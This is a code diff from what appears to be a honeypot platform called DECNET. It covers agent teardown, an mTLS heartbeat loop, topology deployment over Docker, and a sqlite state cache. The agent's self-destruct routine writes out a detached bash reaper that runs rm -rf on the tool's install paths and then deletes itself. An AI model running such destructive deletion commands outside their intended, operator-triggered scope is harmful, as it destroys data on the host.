log.info("agent.teardown decky_id=%s", decky_id)
|
||||
await asyncio.to_thread(_deployer.teardown, decky_id)
|
||||
if decky_id is None:
|
||||
await asyncio.to_thread(clear_state)
|
||||
|
||||
|
||||
def _decky_runtime_states(config: DecnetConfig) -> dict[str, dict[str, Any]]:
|
||||
"""Map decky_name → {"running": bool, "services": {svc: container_state}}.
|
||||
|
||||
Queried so the master can tell, after a partial-failure deploy, which
|
||||
deckies actually came up instead of tainting the whole shard as failed.
|
||||
Best-effort: a docker error returns an empty map, not an exception.
|
||||
"""
|
||||
try:
|
||||
import docker # local import — agent-only path
|
||||
client = docker.from_env()
|
||||
live = {c.name: c.status for c in client.containers.list(all=True, ignore_removed=True)}
|
||||
except Exception: # pragma: no cover — defensive
|
||||
log.exception("_decky_runtime_states: docker query failed")
|
||||
return {}
|
||||
|
||||
out: dict[str, dict[str, Any]] = {}
|
||||
for d in config.deckies:
|
||||
svc_states = {
|
||||
svc: live.get(f"{d.name}-{svc.replace('_', '-')}", "absent")
|
||||
for svc in d.services
|
||||
}
|
||||
out[d.name] = {
|
||||
"running": bool(svc_states) and all(s == "running" for s in svc_states.values()),
|
||||
"services": svc_states,
|
||||
}
|
||||
return out
|
||||
|
||||
|
||||
_REAPER_SCRIPT = r"""#!/bin/bash
|
||||
# DECNET agent self-destruct reaper.
|
||||
# Runs detached from the agent process so it survives the agent's death.
|
||||
# Waits briefly for the HTTP response to drain, then stops services,
|
||||
# wipes install paths, and preserves logs.
|
||||
set +e
|
||||
|
||||
sleep 3
|
||||
|
||||
# Stop decky containers started by the local deployer (best-effort).
|
||||
if command -v docker >/dev/null 2>&1; then
|
||||
docker ps -q --filter "label=com.docker.compose.project=decnet" | xargs -r docker stop
|
||||
docker ps -aq --filter "label=com.docker.compose.project=decnet" | xargs -r docker rm -f
|
||||
docker network rm decnet_lan 2>/dev/null
|
||||
fi
|
||||
|
||||
# Stop+disable every systemd unit the installer may have dropped.
|
||||
for unit in decnet-agent decnet-engine decnet-collector decnet-forwarder decnet-prober decnet-reconciler decnet-sniffer decnet-updater; do
|
||||
systemctl stop "$unit" 2>/dev/null
|
||||
systemctl disable "$unit" 2>/dev/null
|
||||
done
|
||||
|
||||
# Nuke install paths. Logs under /var/log/decnet* are intentionally
|
||||
# preserved — the operator typically wants them for forensic review.
|
||||
rm -rf /opt/decnet* /var/lib/decnet/* /usr/local/bin/decnet* /etc/decnet
|
||||
rm -f /etc/systemd/system/decnet-*.service /etc/systemd/system/decnet-*.timer
|
||||
|
||||
systemctl daemon-reload 2>/dev/null
|
||||
rm -f "$0"
|
||||
"""
|
||||
|
||||
|
||||
async def self_destruct() -> None:
|
||||
"""Tear down deckies, then spawn a detached reaper that wipes the
|
||||
install footprint. Returns immediately so the HTTP response can drain
|
||||
before the reaper starts deleting files out from under the agent."""
|
||||
import os
|
||||
import shutil
|
||||
import subprocess # nosec B404
|
||||
import tempfile
|
||||
|
||||
# Best-effort teardown first — the reaper also runs docker stop, but
|
||||
# going through the deployer gives the host-macvlan/ipvlan helper a
|
||||
# chance to clean up routes cleanly.
|
||||
try:
|
||||
await asyncio.to_thread(_deployer.teardown, None)
|
||||
await asyncio.to_thread(clear_state)
|
||||
except Exception:
|
||||
log.exception("self_destruct: pre-reap teardown failed — reaper will force-stop containers")
|
||||
|
||||
# Reaper lives under /tmp so it survives rm -rf /opt/decnet*.
|
||||
fd, path = tempfile.mkstemp(prefix="decnet-reaper-", suffix=".sh", dir="/tmp") # nosec B108 — reaper must outlive /opt/decnet removal
|
||||
try:
|
||||
os.write(fd, _REAPER_SCRIPT.encode())
|
||||
finally:
|
||||
os.close(fd)
|
||||
os.chmod(path, 0o700) # nosec B103 — root-owned reaper, needs exec
|
||||
|
||||
# The reaper MUST run outside decnet-agent.service's cgroup — otherwise
|
||||
# `systemctl stop decnet-agent` SIGTERMs the whole cgroup (reaper included)
|
||||
# before rm -rf completes. `start_new_session=True` gets us a fresh POSIX
|
||||
# session but does NOT escape the systemd cgroup. So we prefer
|
||||
# `systemd-run --scope` (launches the command in a transient scope
|
||||
# detached from the caller's service), falling back to a bare Popen if
|
||||
# systemd-run is unavailable (non-systemd host / container).
|
||||
systemd_run = shutil.which("systemd-run")
|
||||
if systemd_run:
|
||||
argv = [
|
||||
systemd_run,
|
||||
"--collect",
|
||||
"--unit", f"decnet-reaper-{os.getpid()}",
|
||||
"--description", "DECNET agent self-destruct reaper",
|
||||
"/bin/bash", path,
|
||||
]
|
||||
spawn_kwargs = {"start_new_session": True}
|
||||
else:
|
||||
argv = ["/bin/bash", path]
|
||||
spawn_kwargs = {"start_new_session": True}
|
||||
|
||||
subprocess.Popen( # nosec B603
|
||||
argv,
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.DEVNULL,
|
||||
close_fds=True,
|
||||
**spawn_kwargs,
|
||||
)
|
||||
log.warning(
|
||||
"self_destruct: reaper spawned path=%s via=%s — agent will die in ~3s",
|
||||
path, "systemd-run" if systemd_run else "popen",
|
||||
)
|
||||
|
||||
|
||||
async def status() -> dict[str, Any]:
|
||||
state = await asyncio.to_thread(load_state)
|
||||
if state is None:
|
||||
return {"deployed": False, "deckies": []}
|
||||
config, _compose_path = state
|
||||
runtime = await asyncio.to_thread(_decky_runtime_states, config)
|
||||
return {
|
||||
"deployed": True,
|
||||
"mode": config.mode,
|
||||
"compose_path": str(_compose_path),
|
||||
"deckies": [d.model_dump() for d in config.deckies],
|
||||
"runtime": runtime,
|
||||
}
|
||||
@@ -1,146 +0,0 @@
|
||||
"""Agent → master liveness heartbeat loop.
|
||||
|
||||
Every ``INTERVAL_S`` seconds the worker posts ``executor.status()`` to
|
||||
``POST <master>/swarm/heartbeat`` over mTLS. The master pins the
|
||||
presented client cert's SHA-256 against the ``SwarmHost`` row for the
|
||||
claimed ``host_uuid``; a match refreshes ``last_heartbeat`` + each
|
||||
``DeckyShard``'s snapshot + runtime state.
|
||||
|
||||
Identity comes from ``/etc/decnet/decnet.ini`` (seeded by the enroll
|
||||
bundle) — specifically ``DECNET_HOST_UUID`` and ``DECNET_MASTER_HOST``.
|
||||
The worker's existing ``~/.decnet/agent/`` bundle (or
|
||||
``/etc/decnet/agent/``) provides the mTLS client cert.
|
||||
|
||||
Started/stopped via the agent FastAPI app's lifespan. If identity
|
||||
plumbing is missing (pre-enrollment dev runs) the loop logs at DEBUG and
|
||||
declines to start — callers don't have to guard it.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import pathlib
|
||||
from typing import Optional
|
||||
|
||||
import httpx
|
||||
|
||||
from decnet.agent import executor as _exec
|
||||
from decnet.logging import get_logger
|
||||
from decnet.swarm import pki
|
||||
from decnet.swarm.log_forwarder import build_worker_ssl_context
|
||||
|
||||
log = get_logger("agent.heartbeat")
|
||||
|
||||
INTERVAL_S = 30.0
|
||||
_TIMEOUT = httpx.Timeout(connect=5.0, read=10.0, write=5.0, pool=5.0)
|
||||
|
||||
_task: Optional[asyncio.Task] = None
|
||||
|
||||
|
||||
def _resolve_agent_dir() -> pathlib.Path:
|
||||
"""Match the agent-dir resolution order used by the agent server:
|
||||
DECNET_AGENT_DIR env, else /etc/decnet/agent (production install),
|
||||
else ~/.decnet/agent (dev)."""
|
||||
import os
|
||||
env = os.environ.get("DECNET_AGENT_DIR")
|
||||
if env:
|
||||
return pathlib.Path(env)
|
||||
system = pathlib.Path("/etc/decnet/agent")
|
||||
if system.exists():
|
||||
return system
|
||||
return pki.DEFAULT_AGENT_DIR
|
||||
|
||||
|
||||
async def _tick(client: httpx.AsyncClient, url: str, host_uuid: str, agent_version: str) -> None:
|
||||
snap = await _exec.status()
|
||||
body: dict = {
|
||||
"host_uuid": host_uuid,
|
||||
"agent_version": agent_version,
|
||||
"status": snap,
|
||||
}
|
||||
# Best-effort: fold in applied-topology snapshot. Failures must never
|
||||
# wedge the heartbeat loop — master will fall back to "no topology
|
||||
# reported" which triggers a resync if it expected one.
|
||||
try:
|
||||
from decnet.agent import topology_ops as _topo_ops
|
||||
from decnet.agent.topology_store import TopologyStore
|
||||
store = TopologyStore(_resolve_agent_dir() / "topology.db")
|
||||
try:
|
||||
body["topology"] = _topo_ops.state(store)
|
||||
finally:
|
||||
store.close()
|
||||
except Exception:
|
||||
log.debug("heartbeat: topology state unavailable", exc_info=True)
|
||||
|
||||
resp = await client.post(url, json=body)
|
||||
# 403 / 404 are terminal-ish — we still keep looping because an
|
||||
# operator may re-enrol the host mid-session, but we log loudly so
|
||||
# prod ops can spot cert-pinning drift.
|
||||
if resp.status_code == 204:
|
||||
return
|
||||
log.warning(
|
||||
"heartbeat rejected status=%d body=%s",
|
||||
resp.status_code, resp.text[:200],
|
||||
)
|
||||
|
||||
|
||||
async def _loop(url: str, host_uuid: str, agent_version: str, ssl_ctx) -> None:
|
||||
log.info("heartbeat loop starting url=%s host_uuid=%s interval=%ss",
|
||||
url, host_uuid, INTERVAL_S)
|
||||
async with httpx.AsyncClient(verify=ssl_ctx, timeout=_TIMEOUT) as client:
|
||||
while True:
|
||||
try:
|
||||
await _tick(client, url, host_uuid, agent_version)
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception:
|
||||
log.exception("heartbeat tick failed — will retry in %ss", INTERVAL_S)
|
||||
await asyncio.sleep(INTERVAL_S)
|
||||
|
||||
|
||||
def start() -> Optional[asyncio.Task]:
|
||||
"""Kick off the background heartbeat task. No-op if identity is
|
||||
unconfigured (dev mode) — the caller doesn't need to check."""
|
||||
global _task
|
||||
from decnet.env import (
|
||||
DECNET_HOST_UUID,
|
||||
DECNET_MASTER_HOST,
|
||||
DECNET_SWARMCTL_PORT,
|
||||
)
|
||||
|
||||
if _task is not None and not _task.done():
|
||||
return _task
|
||||
if not DECNET_HOST_UUID or not DECNET_MASTER_HOST:
|
||||
log.debug("heartbeat not starting — DECNET_HOST_UUID or DECNET_MASTER_HOST unset")
|
||||
return None
|
||||
|
||||
agent_dir = _resolve_agent_dir()
|
||||
try:
|
||||
ssl_ctx = build_worker_ssl_context(agent_dir)
|
||||
except Exception:
|
||||
log.exception("heartbeat not starting — worker SSL context unavailable at %s", agent_dir)
|
||||
return None
|
||||
|
||||
try:
|
||||
from decnet import __version__ as _v
|
||||
agent_version = _v
|
||||
except Exception:
|
||||
agent_version = "unknown"
|
||||
|
||||
url = f"https://{DECNET_MASTER_HOST}:{DECNET_SWARMCTL_PORT}/swarm/heartbeat"
|
||||
_task = asyncio.create_task(
|
||||
_loop(url, DECNET_HOST_UUID, agent_version, ssl_ctx),
|
||||
name="agent-heartbeat",
|
||||
)
|
||||
return _task
|
||||
|
||||
|
||||
async def stop() -> None:
|
||||
global _task
|
||||
if _task is None:
|
||||
return
|
||||
_task.cancel()
|
||||
try:
|
||||
await _task
|
||||
except (asyncio.CancelledError, Exception):
|
||||
pass
|
||||
_task = None
|
||||
@@ -1,70 +0,0 @@
|
||||
"""Worker-agent uvicorn launcher.
|
||||
|
||||
Starts ``decnet.agent.app:app`` over HTTPS with mTLS enforcement. The
|
||||
worker must already have a bundle in ``~/.decnet/agent/`` (delivered by
|
||||
``decnet swarm enroll`` from the master); if it does not, we refuse to
|
||||
start — unauthenticated agents are not a supported mode.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import pathlib
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
|
||||
from decnet.logging import get_logger
|
||||
from decnet.swarm import pki
|
||||
|
||||
log = get_logger("agent.server")
|
||||
|
||||
|
||||
def run(host: str, port: int, agent_dir: pathlib.Path = pki.DEFAULT_AGENT_DIR) -> int:
|
||||
bundle = pki.load_worker_bundle(agent_dir)
|
||||
if bundle is None:
|
||||
print(
|
||||
f"[agent] No cert bundle at {agent_dir}. "
|
||||
f"Run `decnet swarm enroll` from the master first.",
|
||||
file=sys.stderr,
|
||||
)
|
||||
return 2
|
||||
|
||||
keyfile = agent_dir / "worker.key"
|
||||
certfile = agent_dir / "worker.crt"
|
||||
cafile = agent_dir / "ca.crt"
|
||||
|
||||
cmd = [
|
||||
sys.executable,
|
||||
"-m",
|
||||
"uvicorn",
|
||||
"decnet.agent.app:app",
|
||||
"--host",
|
||||
host,
|
||||
"--port",
|
||||
str(port),
|
||||
"--ssl-keyfile",
|
||||
str(keyfile),
|
||||
"--ssl-certfile",
|
||||
str(certfile),
|
||||
"--ssl-ca-certs",
|
||||
str(cafile),
|
||||
# 2 == ssl.CERT_REQUIRED — clients MUST present a CA-signed cert.
|
||||
"--ssl-cert-reqs",
|
||||
"2",
|
||||
]
|
||||
log.info("agent starting host=%s port=%d bundle=%s", host, port, agent_dir)
|
||||
# Own process group for clean Ctrl+C / SIGTERM propagation to uvicorn
|
||||
# workers (same pattern as `decnet api`).
|
||||
proc = subprocess.Popen(cmd, start_new_session=True) # nosec B603
|
||||
try:
|
||||
return proc.wait()
|
||||
except KeyboardInterrupt:
|
||||
try:
|
||||
os.killpg(proc.pid, signal.SIGTERM)
|
||||
try:
|
||||
return proc.wait(timeout=10)
|
||||
except subprocess.TimeoutExpired:
|
||||
os.killpg(proc.pid, signal.SIGKILL)
|
||||
return proc.wait()
|
||||
except ProcessLookupError:
|
||||
return 0
|
||||
@@ -1,208 +0,0 @@
|
||||
"""Agent-side topology apply/teardown/state primitives.
|
||||
|
||||
Wraps the compose + bridge machinery from :mod:`decnet.engine.deployer`
|
||||
so the agent can drive a topology without ever touching the master's
|
||||
sqlmodel repo. The master-side ``deploy_topology`` always calls
|
||||
``transition_status(repo, …)`` which is useless (and unreachable) on
|
||||
an agent — here we operate purely on a hydrated dict + the local
|
||||
:class:`TopologyStore`.
|
||||
|
||||
v1 constraint: one topology per agent. A second apply for a different
|
||||
``topology_id`` triggers an on-the-spot teardown of the predecessor
|
||||
before the new apply proceeds — master is authoritative.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import subprocess # nosec B404
|
||||
from typing import Any
|
||||
|
||||
import docker
|
||||
|
||||
from decnet.agent.topology_store import (
|
||||
TopologyStore,
|
||||
observed,
|
||||
)
|
||||
from decnet.engine.deployer import (
|
||||
_compose,
|
||||
_compose_with_retry,
|
||||
_teardown_order,
|
||||
_topology_compose_path,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
from decnet.network import create_bridge_network, remove_bridge_network
|
||||
from decnet.topology.compose import (
|
||||
_network_name as _topology_network_name,
|
||||
write_topology_compose,
|
||||
)
|
||||
from decnet.topology.hashing import canonical_hash
|
||||
from decnet.topology.validate import (
|
||||
ValidationError,
|
||||
errors as _validation_errors,
|
||||
validate as _validate_topology,
|
||||
)
|
||||
|
||||
log = get_logger("agent.topology_ops")
|
||||
|
||||
|
||||
class HashMismatch(RuntimeError):
|
||||
"""Raised when the master-provided version_hash doesn't match what we
|
||||
hash locally — suggests serialisation drift. We fail loudly rather
|
||||
than silently papering over a schema mismatch."""
|
||||
|
||||
|
||||
def _topology_id(hydrated: dict[str, Any]) -> str:
|
||||
topo = hydrated.get("topology") or {}
|
||||
tid = topo.get("id")
|
||||
if not tid:
|
||||
raise ValueError("hydrated topology missing topology.id")
|
||||
return str(tid)
|
||||
|
||||
|
||||
async def apply(
|
||||
hydrated: dict[str, Any],
|
||||
version_hash: str,
|
||||
store: TopologyStore,
|
||||
) -> None:
|
||||
"""Materialise *hydrated* on this agent and record it in *store*.
|
||||
|
||||
Raises:
|
||||
HashMismatch: master and agent disagree on the canonical hash —
|
||||
don't touch docker, fail the apply.
|
||||
ValidationError: topology fails structural validation.
|
||||
Any docker / compose error propagates up; the endpoint maps it
|
||||
to 500 and records the message on the store row.
|
||||
"""
|
||||
local_hash = canonical_hash(hydrated)
|
||||
if local_hash != version_hash:
|
||||
raise HashMismatch(
|
||||
f"master hash {version_hash!r} does not match agent hash "
|
||||
f"{local_hash!r} — refusing to apply"
|
||||
)
|
||||
|
||||
issues = _validate_topology(hydrated)
|
||||
if _validation_errors(issues):
|
||||
raise ValidationError(issues)
|
||||
|
||||
topology_id = _topology_id(hydrated)
|
||||
# Master is authoritative. If a different topology is pinned here
|
||||
# — whether it fully applied, only partially applied (failure
|
||||
# marker row + orphan containers), or drifted — teardown first,
|
||||
# then accept the new one. Refusing with 409 would leave the
|
||||
# agent stuck in a state only a human could resolve.
|
||||
existing = store.current()
|
||||
if existing is not None and existing.topology_id != topology_id:
|
||||
log.info(
|
||||
"superseding topology %s with %s on master authority",
|
||||
existing.topology_id, topology_id,
|
||||
)
|
||||
try:
|
||||
await teardown(existing.topology_id, store)
|
||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||
log.warning(
|
||||
"best-effort teardown of superseded topology %s failed: %s",
|
||||
existing.topology_id, exc,
|
||||
)
|
||||
# Hard-clear the store row so the new apply isn't blocked
|
||||
# by a half-torn-down predecessor. Leftover docker objects
|
||||
# will surface via the next heartbeat's observed block.
|
||||
store.clear(existing.topology_id)
|
||||
|
||||
lans = hydrated["lans"]
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
client = docker.from_env()
|
||||
|
||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
||||
# stall the event loop on a slow docker daemon.
|
||||
def _materialise() -> None:
|
||||
for lan in lans:
|
||||
net_name = _topology_network_name(topology_id, lan["name"])
|
||||
internal = not lan["is_dmz"]
|
||||
create_bridge_network(
|
||||
client, net_name, lan["subnet"], internal=internal
|
||||
)
|
||||
write_topology_compose(hydrated, compose_path)
|
||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
||||
# fresh: every decky service joins its base's netns via
|
||||
# ``network_mode: container:<base>``, and that share is bound at
|
||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
||||
# changes after toggling ``forwards_l3``) but compose decides the
|
||||
# services are unchanged, the services keep a stale netns FD
|
||||
# pointing at the destroyed base — they end up in an empty
|
||||
# namespace with only ``lo``, and external traffic hits a closed
|
||||
# port on the live base. Forcing dependents to recreate alongside
|
||||
# the base is the cheapest way to make this race impossible.
|
||||
_compose_with_retry(
|
||||
"up", "--build", "-d", "--always-recreate-deps",
|
||||
compose_file=compose_path,
|
||||
)
|
||||
|
||||
await asyncio.to_thread(_materialise)
|
||||
|
||||
store.put(topology_id, version_hash, hydrated)
|
||||
log.info(
|
||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
||||
)
|
||||
|
||||
|
||||
async def teardown(
|
||||
topology_id: str,
|
||||
store: TopologyStore,
|
||||
) -> None:
|
||||
"""Tear down *topology_id* on this agent. Idempotent: if there's no
|
||||
record and no compose file, it's a no-op that still returns cleanly."""
|
||||
row = store.current()
|
||||
# Prefer the stored hydrated blob — it's what we applied with. If
|
||||
# it's gone (db wiped) but compose-file lingers, we still try to
|
||||
# compose-down and delete bridges by scanning the compose file's
|
||||
# LAN membership list via the hydrated blob if available.
|
||||
hydrated = row.hydrated if row and row.topology_id == topology_id else None
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
client = docker.from_env()
|
||||
|
||||
def _dismantle() -> None:
|
||||
if compose_path.exists():
|
||||
try:
|
||||
_compose("down", "--remove-orphans", compose_file=compose_path)
|
||||
except subprocess.CalledProcessError as exc:
|
||||
log.warning(
|
||||
"topology %s compose down failed (continuing): %s",
|
||||
topology_id, exc,
|
||||
)
|
||||
if hydrated is not None:
|
||||
for lan_name in _teardown_order(hydrated["lans"]):
|
||||
net_name = _topology_network_name(topology_id, lan_name)
|
||||
remove_bridge_network(client, net_name)
|
||||
if compose_path.exists():
|
||||
compose_path.unlink()
|
||||
|
||||
await asyncio.to_thread(_dismantle)
|
||||
store.clear(topology_id)
|
||||
log.info("topology %s torn down on agent", topology_id)
|
||||
|
||||
|
||||
def state(store: TopologyStore) -> dict[str, Any]:
|
||||
"""Snapshot-plus-live-observation — the shape the heartbeat embeds."""
|
||||
row = store.current()
|
||||
try:
|
||||
obs = observed(docker.from_env())
|
||||
except Exception as exc: # noqa: BLE001 — docker socket may be gone
|
||||
obs = {"error": str(exc)[:200]}
|
||||
if row is None:
|
||||
return {
|
||||
"topology_id": None,
|
||||
"applied_version_hash": None,
|
||||
"applied_at": None,
|
||||
"last_error": None,
|
||||
"observed": obs,
|
||||
}
|
||||
return {
|
||||
"topology_id": row.topology_id,
|
||||
"applied_version_hash": row.applied_version_hash,
|
||||
"applied_at": row.applied_at,
|
||||
"last_error": row.last_error,
|
||||
"observed": obs,
|
||||
}
|
||||
|
||||
|
||||
__all__ = ["apply", "teardown", "state", "HashMismatch"]
|
||||
@@ -1,213 +0,0 @@
|
||||
"""Agent-side sqlite cache of the currently-applied topology.
|
||||
|
||||
**This is a cache, not a source of truth.** The master is the only
|
||||
authority for what the agent should be running. This store exists so
|
||||
the agent can answer two questions quickly and offline:
|
||||
|
||||
1. What topology did I last apply, and with what version hash?
|
||||
2. Is what docker is currently doing consistent with that?
|
||||
|
||||
The hash goes out on every heartbeat; the master compares it to what
|
||||
it thinks this host should be running and schedules a re-push on
|
||||
mismatch.
|
||||
|
||||
Why sqlite when the blob is JSON? Consistent with
|
||||
:mod:`decnet.swarm.log_forwarder._OffsetStore` — single-row sqlite is
|
||||
the project-wide pattern for agent-local persistent state. Keeps
|
||||
operational mental model small: "one state.db per thing".
|
||||
|
||||
Design choices worth calling out:
|
||||
|
||||
- **One row, one topology.** v1 only supports a single topology per
|
||||
agent. Attempting to :meth:`put` a different ``topology_id`` while
|
||||
a row already exists raises :class:`AlreadyApplied` — the agent
|
||||
rejects the apply with 409 and the master is expected to teardown
|
||||
the old one first.
|
||||
- **No auto-restore on boot.** The agent does NOT read this db at
|
||||
startup and try to re-apply. Whatever docker has after a restart
|
||||
is what it has; the next heartbeat reports the truth and the
|
||||
master decides whether to re-push. Same reason we don't sync
|
||||
mutations from agent → master anywhere else: split-brain is worse
|
||||
than temporary drift.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import pathlib
|
||||
import sqlite3
|
||||
import time
|
||||
from dataclasses import dataclass
|
||||
from typing import Any, Optional
|
||||
|
||||
|
||||
class AlreadyApplied(RuntimeError):
|
||||
"""Raised when a different topology is already pinned to this agent."""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class AppliedRow:
|
||||
topology_id: str
|
||||
applied_version_hash: str
|
||||
hydrated: dict[str, Any]
|
||||
applied_at: int
|
||||
last_error: Optional[str]
|
||||
|
||||
|
||||
class TopologyStore:
|
||||
"""Single-row sqlite cache. Stdlib only, sync (called from endpoints)."""
|
||||
|
||||
def __init__(self, db_path: pathlib.Path) -> None:
|
||||
db_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
# check_same_thread=False: Starlette/FastAPI runs sync endpoint
|
||||
# bodies on a worker thread distinct from where `app` is imported.
|
||||
# The agent is single-process, so there's no real contention —
|
||||
# sqlite's own connection lock is enough.
|
||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||
self._conn.execute(
|
||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||
" topology_id TEXT PRIMARY KEY,"
|
||||
" applied_version_hash TEXT NOT NULL,"
|
||||
" hydrated_blob_json TEXT NOT NULL,"
|
||||
" applied_at INTEGER NOT NULL,"
|
||||
" last_error TEXT)"
|
||||
)
|
||||
self._conn.commit()
|
||||
|
||||
# ----------------------------------------------------------------- reads
|
||||
|
||||
def current(self) -> Optional[AppliedRow]:
|
||||
"""Return the single applied topology, or ``None`` if idle."""
|
||||
row = self._conn.execute(
|
||||
"SELECT topology_id, applied_version_hash, hydrated_blob_json,"
|
||||
" applied_at, last_error FROM applied_topology LIMIT 1"
|
||||
).fetchone()
|
||||
if row is None:
|
||||
return None
|
||||
return AppliedRow(
|
||||
topology_id=row[0],
|
||||
applied_version_hash=row[1],
|
||||
hydrated=json.loads(row[2]),
|
||||
applied_at=int(row[3]),
|
||||
last_error=row[4],
|
||||
)
|
||||
|
||||
# ---------------------------------------------------------------- writes
|
||||
|
||||
def put(
|
||||
self,
|
||||
topology_id: str,
|
||||
applied_version_hash: str,
|
||||
hydrated: dict[str, Any],
|
||||
) -> None:
|
||||
"""Record an applied topology.
|
||||
|
||||
If a *different* topology is already recorded, raises
|
||||
:class:`AlreadyApplied`. Re-applying the same ``topology_id``
|
||||
just updates the hash + blob (idempotent re-push).
|
||||
"""
|
||||
existing = self.current()
|
||||
if existing is not None and existing.topology_id != topology_id:
|
||||
raise AlreadyApplied(
|
||||
f"agent already has topology {existing.topology_id!r}; "
|
||||
f"cannot apply {topology_id!r}"
|
||||
)
|
||||
self._conn.execute(
|
||||
"INSERT INTO applied_topology"
|
||||
" (topology_id, applied_version_hash, hydrated_blob_json,"
|
||||
" applied_at, last_error)"
|
||||
" VALUES (?, ?, ?, ?, NULL)"
|
||||
" ON CONFLICT(topology_id) DO UPDATE SET"
|
||||
" applied_version_hash=excluded.applied_version_hash,"
|
||||
" hydrated_blob_json=excluded.hydrated_blob_json,"
|
||||
" applied_at=excluded.applied_at,"
|
||||
" last_error=NULL",
|
||||
(
|
||||
topology_id,
|
||||
applied_version_hash,
|
||||
json.dumps(hydrated, sort_keys=True),
|
||||
int(time.time()),
|
||||
),
|
||||
)
|
||||
self._conn.commit()
|
||||
|
||||
def record_error(
|
||||
self,
|
||||
topology_id: str,
|
||||
message: str,
|
||||
hydrated: Optional[dict[str, Any]] = None,
|
||||
) -> None:
|
||||
"""Attach a last-error message for *topology_id*.
|
||||
|
||||
Upserts a marker row when no apply has yet succeeded for this
|
||||
topology — that way a failure *during* the first materialise
|
||||
(put() hasn't been reached) still surfaces via GET
|
||||
/topology/state and the next heartbeat. The marker row uses an
|
||||
empty ``applied_version_hash`` so master's heartbeat check sees
|
||||
the hash mismatch and schedules a resync.
|
||||
|
||||
If *hydrated* is provided it is stored so a later teardown can
|
||||
still walk the LAN list — otherwise a partial deploy is strands
|
||||
containers + bridges with no breadcrumb back to them.
|
||||
"""
|
||||
blob = json.dumps(hydrated, sort_keys=True) if hydrated else "{}"
|
||||
self._conn.execute(
|
||||
"INSERT INTO applied_topology"
|
||||
" (topology_id, applied_version_hash, hydrated_blob_json,"
|
||||
" applied_at, last_error)"
|
||||
" VALUES (?, '', ?, 0, ?)"
|
||||
" ON CONFLICT(topology_id) DO UPDATE SET"
|
||||
" last_error=excluded.last_error,"
|
||||
" hydrated_blob_json=CASE"
|
||||
" WHEN applied_topology.hydrated_blob_json='{}'"
|
||||
" THEN excluded.hydrated_blob_json"
|
||||
" ELSE applied_topology.hydrated_blob_json END",
|
||||
(topology_id, blob, message),
|
||||
)
|
||||
self._conn.commit()
|
||||
|
||||
def clear(self, topology_id: str) -> None:
|
||||
"""Remove the row for *topology_id* (post-teardown).
|
||||
|
||||
No-op if the row doesn't exist — makes teardown idempotent.
|
||||
"""
|
||||
self._conn.execute(
|
||||
"DELETE FROM applied_topology WHERE topology_id=?",
|
||||
(topology_id,),
|
||||
)
|
||||
self._conn.commit()
|
||||
|
||||
def close(self) -> None:
|
||||
self._conn.close()
|
||||
|
||||
|
||||
# --------------------------------------------------- live docker observation
|
||||
|
||||
|
||||
def observed(docker_client: Any) -> dict[str, Any]:
|
||||
"""Snapshot what docker is *actually* running on this agent.
|
||||
|
||||
Returns a compact dict the heartbeat can ship so the master can
|
||||
cross-check ``applied_version_hash`` against reality (a matching
|
||||
hash with missing bridges is still drift). Best-effort: if docker
|
||||
is unreachable we return an ``error`` marker rather than raising —
|
||||
the agent still needs to heartbeat, and the master can treat
|
||||
``error`` as "unknown, re-push".
|
||||
"""
|
||||
try:
|
||||
bridges = [
|
||||
n.name
|
||||
for n in docker_client.networks.list()
|
||||
if n.attrs.get("Driver") == "bridge"
|
||||
and n.name.startswith("decnet-topology-")
|
||||
]
|
||||
containers = [
|
||||
c.name
|
||||
for c in docker_client.containers.list(all=False)
|
||||
if c.name.startswith("decnet-")
|
||||
]
|
||||
return {"bridges": sorted(bridges), "containers": sorted(containers)}
|
||||
except Exception as exc: # noqa: BLE001 — best-effort observation
|
||||
return {"error": str(exc)[:200]}
|
||||
|
||||
|
||||
__all__ = ["TopologyStore", "AppliedRow", "AlreadyApplied", "observed"]
|
||||
@@ -148,7 +148,7 @@ ARCHETYPES: dict[str, Archetype] = {
|
||||
slug="deaddeck",
|
||||
display_name="Deaddeck (Entry Point)",
|
||||
description="Internet-facing entry point with real interactive SSH — no honeypot emulation",
|
||||
services=["ssh"],
|
||||
services=["real_ssh"],
|
||||
preferred_distros=["debian", "ubuntu22"],
|
||||
nmap_os="linux",
|
||||
),
|
||||
@@ -167,4 +167,4 @@ def all_archetypes() -> dict[str, Archetype]:
|
||||
|
||||
|
||||
def random_archetype() -> Archetype:
|
||||
return random.choice(list(ARCHETYPES.values())) # nosec B311
|
||||
return random.choice(list(ARCHETYPES.values()))
|
||||
|
||||
@@ -1,92 +0,0 @@
|
||||
"""
|
||||
IP-to-ASN enrichment — maps attacker IPs to BGP-announced AS numbers and
|
||||
org names for attacker intelligence.
|
||||
|
||||
Public surface mirrors :mod:`decnet.geoip` so callers can compose them:
|
||||
|
||||
* :func:`get_lookup` — returns the singleton :class:`AsnLookup`.
|
||||
* :func:`enrich_ip` — takes an IP string, returns
|
||||
``(asn_int, asn_name, provider_name)`` or ``(None, None, None)``.
|
||||
|
||||
Provider selection goes through :func:`~decnet.asn.factory.get_provider`
|
||||
(env ``DECNET_ASN_PROVIDER``, default ``iptoasn``). Direct imports of
|
||||
concrete providers are forbidden — mirrors the ``get_bus`` /
|
||||
``get_repository`` rule.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import time
|
||||
from typing import Optional, Tuple
|
||||
|
||||
